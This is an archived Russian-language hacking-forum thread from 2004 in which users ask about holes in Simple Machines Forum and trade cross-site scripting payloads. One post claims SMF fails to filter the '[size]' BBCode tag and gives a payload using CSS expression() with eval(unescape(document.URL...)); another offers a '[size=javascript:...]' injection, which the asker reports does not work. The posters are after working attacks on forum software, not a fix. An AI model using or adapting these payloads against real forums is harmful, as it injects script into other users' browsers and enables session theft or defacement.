Вопрос про уязвимости в Simple machines forum [Архив]

Просмотр полной версии : Вопрос про уязвимости в Simple machines forum

19.08.2004, 02:37

Кто знает дырки в нем есть

Sky

26.08.2004, 19:55

И что мона с этим сотварить?</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">SMF не фильтрует данные, представленные пользователем в тэге '[size]'. Пример:

[size=expression(eval(unescape(document.URL.substr ing(document.URL.
length-41,document.URL.length))))]Big Exploit[/size]

[/QUOTE]<span id='postcolor'>

Че Гевара

26.08.2004, 22:40

Вставить скрипт...
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[size=javascript:alert('LOL');]LOL[/size]
[/QUOTE]<span id='postcolor'>
Это чисто пример ...

Sky

27.08.2004, 11:53

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ августа 26 2004,22:40)</td></tr><tr><td id="QUOTE">Вставить скрипт...
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[size=javascript:alert('LOL');]LOL[/size]
[/QUOTE]<span id='postcolor'>
Это чисто пример ...[/QUOTE]<span id='postcolor'>
Спасибо тебе конечно за пример но он не прокатывает http://forum.antichat.ru/iB_html/non-cgi/emoticons/confused.gif

Че Гевара

27.08.2004, 14:09

Ты же написал, что не фильтруются данные ...
Смотри по форуму конкретному ...